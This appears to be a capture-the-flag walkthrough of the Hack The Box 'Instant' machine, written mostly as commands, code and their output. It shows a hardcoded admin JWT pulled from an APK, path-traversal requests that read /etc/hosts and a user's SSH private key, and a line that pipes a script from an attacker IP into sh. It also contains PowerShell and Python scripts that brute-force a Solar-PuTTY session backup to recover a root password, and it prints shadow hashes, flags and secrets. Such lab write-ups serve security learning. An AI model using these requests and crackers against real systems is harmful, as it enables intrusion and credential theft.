Instant
Recon
HTTP

APK
Decompile the APK with https://www.decompiler.com/jar/3b652ecd27c6422cb944b974af1945a1/instant.apk. AdminActivities.java contains a hardcoded admin JWT in the Authorization header:

new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/view/profile").addHeader("Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA").build()).enqueue(new Callback() {
Update hosts:
└─$ grep inst /etc/hosts
10.129.89.112 instant.htb mywalletv1.instant.htb
└─$ curl 'http://mywalletv1.instant.htb/api/v1/view/profile' -H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA'
{"Profile":{"account_status":"active","email":"admin@instant.htb","invite_token":"instant_admin_inv","role":"Admin","username":"instantAdmin","wallet_balance":"10000000","wallet_id":"f0eca6e5-783a-471d-9d8f-0162cbc900db"},"Status":200}
API actions:
└─$ grep 'http://.*instant.htb.*")' . -Raino
./instant/TransactionActivity.java:58:http://mywalletv1.instant.htb/api/v1/initiate/transaction").addHeader("Authorization", str4).post(RequestBody.create(MediaType.parse("application/json")
./instant/TransactionActivity.java:80:http://mywalletv1.instant.htb/api/v1/confirm/pin").header("Authorization", str4).post(RequestBody.create(MediaType.parse("application/json")
./instant/ProfileActivity.java:37:http://mywalletv1.instant.htb/api/v1/view/profile")
./instant/LoginActivity.java:64:http://mywalletv1.instant.htb/api/v1/login").post(RequestBody.create(MediaType.parse("application/json")
./instant/AdminActivities.java:14:http://mywalletv1.instant.htb/api/v1/view/profile").addHeader("Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA")
./instant/RegisterActivity.java:61:http://mywalletv1.instant.htb/api/v1/register").post(RequestBody.create(MediaType.parse("application/json")
More subdomains:


└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/list/users" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" -s | jq
{
"Status": 200,
"Users": [
{
"email": "admin@instant.htb",
"role": "Admin",
"secret_pin": 87348,
"status": "active",
"username": "instantAdmin",
"wallet_id": "f0eca6e5-783a-471d-9d8f-0162cbc900db"
},
{
"email": "shirohige@instant.htb",
"role": "instantian",
"secret_pin": 42845,
"status": "active",
"username": "shirohige",
"wallet_id": "458715c9-b15e-467b-8a3d-97bc3fcf3c11"
}
]
}
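Possible LFI (the log_file_name parameter accepts ../ sequences, and the response key shows it is appended to /home/shirohige/logs/ unchanged):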

└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" -s | jq
{
"/home/shirohige/logs/../../../../../../etc/hosts": [
"127.0.0.1 localhost instant.htb mywalletv1.instant.htb swagger-ui.instant.htb\n",
"127.0.1.1 instant\n",
"\n",
"# The following lines are desirable for IPv6 capable hosts\n",
"::1 ip6-localhost ip6-loopback\n",
"fe00::0 ip6-localnet\n",
"ff00::0 ip6-mcastprefix\n",
"ff02::1 ip6-allnodes\n",
"ff02::2 ip6-allrouters\n"
],
"Status": 201
}
└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fshirohige%2F.ssh%2Fid_rsa" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" -s | jq -r 'to_entries[0].value | join("") | gsub("\\n";"\n")' | tee shirohige.id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
SSH
└─$ chmod 600 shirohige.id_rsa
└─$ ssh shirohige@instant.htb -i shirohige.id_rsa
User.txt
shirohige@instant:~$ cat user.txt
70d70cb0ba4cd03fc37aa6d0a814ce27
Privilege Escalation
shirohige@instant:~/projects/mywallet$ find . | grep -v env
.
./Instant-Api
./Instant-Api/instance
./Instant-Api/mywallet
./Instant-Api/mywallet/swagger_configs
./Instant-Api/mywallet/swagger_configs/inittrans.yml
./Instant-Api/mywallet/swagger_configs/view_logs.yml
./Instant-Api/mywallet/swagger_configs/profile.yml
./Instant-Api/mywallet/swagger_configs/register.yml
./Instant-Api/mywallet/swagger_configs/login.yml
./Instant-Api/mywallet/swagger_configs/transactions.yml
./Instant-Api/mywallet/swagger_configs/pin.yml
./Instant-Api/mywallet/swagger_configs/add_user.yml
./Instant-Api/mywallet/swagger_configs/read_logs.yml
./Instant-Api/mywallet/swagger_configs/list_users.yml
./Instant-Api/mywallet/app.py
./Instant-Api/mywallet/serve.py
./Instant-Api/mywallet/__pycache__
./Instant-Api/mywallet/__pycache__/models.cpython-312.pyc
./Instant-Api/mywallet/models.py
./Instant-Api/mywallet/requirements.txt
./Instant-Api/mywallet/instance
./Instant-Api/mywallet/instance/instant.db
shirohige@instant:~/projects/mywallet$ cat ./Instant-Api/mywallet/.env
SECRET_KEY=VeryStrongS3cretKeyY0uC4NTGET
└─$ scp -i shirohige.id_rsa shirohige@instant.htb:/home/shirohige/projects/mywallet/Instant-Api/mywallet/instance/instant.db .
└─$ sqlite3 instant.db 'SELECT * FROM wallet_users;'
1|instantAdmin|admin@instant.htb|f0eca6e5-783a-471d-9d8f-0162cbc900db|pbkdf2:sha256:600000$I5bFyb0ZzD69pNX8$e9e4ea5c280e0766612295ab9bff32e5fa1de8f6cbb6586fab7ab7bc762bd978|2024-07-23 00:20:52.529887|87348|Admin|active
2|shirohige|shirohige@instant.htb|458715c9-b15e-467b-8a3d-97bc3fcf3c11|pbkdf2:sha256:600000$YnRgjnim$c9541a8c6ad40bc064979bc446025041ffac9af2f762726971d8a28272c550ed|2024-08-08 20:57:47.909667|42845|instantian|active
The hashes don't seem crackable (pbkdf2:sha256 with 600000 iterations)...
shirohige@instant:~/projects/mywallet$ curl 10.10.14.41/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN 1007/python3
tcp 0 0 127.0.0.1:8808 0.0.0.0:* LISTEN 1011/python3
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
...
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/sbin/lxc
/usr/bin/make
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
...
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Oct 4 15:22 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Oct 4 15:22 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 34 Aug 8 20:45 /etc/apache2/sites-enabled/swagger-ui.conf -> ../sites-available/swagger-ui.conf
<VirtualHost *:80>
ServerName swagger-ui.instant.htb
ProxyPreserveHost On
ProxyPass / http://localhost:8808/
ProxyPassReverse / http://localhost:8808/
</VirtualHost>
lrwxrwxrwx 1 root root 35 Aug 8 20:44 /etc/apache2/sites-enabled/instant-app.conf -> ../sites-available/instant-app.conf
<VirtualHost *:80>
ServerName mywalletv1.instant.htb
ProxyPreserveHost On
ProxyPass / http://localhost:8888/
ProxyPassReverse / http://localhost:8888/
</VirtualHost>
...
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Oct 4 15:22 /etc/ldap
...
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/shirohige
/opt/backups
/opt/backups/Solar-PuTTY
/opt/backups/Solar-PuTTY/sessions-backup.dat
...
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/shirohige/.gnupg/trustdb.gpg
/home/shirohige/.gnupg/pubring.kbx
/tmp/lp.log
...
└─$ scp -i shirohige.id_rsa shirohige@instant.htb:/opt/backups/Solar-PuTTY/sessions-backup.dat .
SolarPuttyDecrypt - Blog Post | SolarPuttyDecrypt - GitHub
Reverse Engineering Solar-PuTTY 4.0.0.47
# Wordlist run against the exported Solar-PuTTY session backup: each line of
# the wordlist is handed to SolarPuttyDecrypt.exe as the backup passphrase.
# The export's confidentiality therefore rests on the passphrase chosen when
# the backup was written.
$wordlist   = "C:\Program Files\Hashcat\rockyou.txt"
$resultLog  = ".\SolarPuttyDecrypt\output.log"
$backupFile = ".\SolarPuttyDecrypt\sessions-backup.dat"
$attempt = 0

Get-Content -Path $wordlist | ForEach-Object {
    $candidate = $_

    # '>' overwrites the log on every attempt, so it only holds the latest run.
    & .\SolarPuttyDecrypt.exe $backupFile $candidate > $resultLog

    # The tool prints this marker only when it wrote a decrypted file.
    $hit = Select-String -Pattern "Decrypted file is saved" -Path $resultLog
    if ($hit) {
        Write-Output "Password: $candidate ($attempt)`n" >> $resultLog
        # ForEach-Object is a cmdlet, not a loop: 'break' ends the whole pipeline.
        break
    }

    $attempt++
}
-----------------------------------------------------
SolarPutty Sessions Decrypter by VoidSec
-----------------------------------------------------
{
"Sessions": [
{
"Id": "066894ee-635c-4578-86d0-d36d4838115b",
"Ip": "10.10.11.37",
"Port": 22,
"ConnectionType": 1,
"SessionName": "Instant",
"Authentication": 0,
"CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
"AuthenticateScript": "00000000-0000-0000-0000-000000000000",
"LastTimeOpen": "0001-01-01T00:00:00",
"OpenCounter": 1,
"SerialLine": null,
"Speed": 0,
"Color": "#FF176998",
"TelnetConnectionWaitSeconds": 1,
"LoggingEnabled": false,
"RemoteDirectory": ""
}
],
"Credentials": [
{
"Id": "452ed919-530e-419b-b721-da76cbe8ed04",
"CredentialsName": "instant-root",
"Username": "root",
"Password": "12**24nzC!r0c%q12",
"PrivateKeyPath": "",
"Passphrase": "",
"PrivateKeyContent": null
}
],
"AuthScript": [],
"Groups": [],
"Tunnels": [],
"LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}
-----------------------------------------------------
[+] DONE Decrypted file is saved in: C:\Users\\OneDrive\Desktop\SolarPutty_sessions_decrypted.txt
Password: estrella (103)
Creds:
root:12**24nzC!r0c%q12
Root.txt
shirohige@instant:~/projects/mywallet/Instant-Api/mywallet$ su -
Password:
root@instant:~# cat root.txt
fb167956c9c63608930d4c8aaae2d12c
Hashes
root@instant:/home/shirohige# cat /etc/shadow | grep '$y'
root:$y$j9T$kbk3gZheVl2NWS6Kg2bYA.$LxNokXrLQvRyfmzXJHiZgzH73o2.Dk6UMGHsyj/Er./:19945:0:99999:7:::
shirohige:$y$j9T$EIEFkB5maGHp2kSFVdu6Q/$7uwKO1Xx2qzjNyqWuNBADn6sCgguYDUX4wfsql9Geq4:19945:0:99999:7:::
Past Root
C# -> Python
import base64
from Crypto.Cipher import DES3
from Crypto.Protocol.KDF import PBKDF2
def decrypt(passphrase, ciphertext):
    """Try to decrypt a base64-encoded, 3DES-CBC-encrypted blob with ``passphrase``.

    Layout read from the decoded blob: bytes 0-23 are the PBKDF2 salt, bytes
    24-31 the IV, and the encrypted payload starts at offset 48 (bytes 32-47
    are not used here). The 24-byte key is derived with PBKDF2 at 1000
    iterations; salt and IV travel inside the blob, so the passphrase is the
    only secret input.

    Returns the decrypted text reduced to its ASCII characters, or '' when any
    step raises (the error is printed, not re-raised).
    """
    plaintext = ''
    try:
        blob = base64.b64decode(ciphertext)
        salt, iv, payload = blob[:24], blob[24:32], blob[48:]

        key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
        raw = DES3.new(key, DES3.MODE_CBC, iv).decrypt(payload)

        # The last byte is taken as the PKCS7 padding length without being
        # validated, so a wrong passphrase usually yields garbage rather than
        # an exception; the caller has to check the content itself.
        pad = raw[-1]
        raw = raw[:-pad]

        plaintext = ''.join(map(chr, filter(lambda b: chr(b).isascii(), raw)))
    except Exception as e:
        print(f'Error: {e}')
    return plaintext
# Load the exported backup once; decrypt() base64-decodes it, so it is read as text.
with open('./sessions-backup.dat') as backup:
    cipher = backup.read()

# Try every wordlist line as the backup passphrase and stop at the first
# result that contains the 'Credentials' key of the decrypted JSON.
with open('rockyou.txt') as passwords:
    for i, password in enumerate(map(str.strip, passwords)):
        decrypted = decrypt(password, cipher)
        # Progress line, rewritten in place through the carriage return.
        print(f'[{i}] {password=}', end='\r')
        if 'Credentials' not in decrypted:
            continue
        print('\r', i, password)
        print()
        print(decrypted)
        break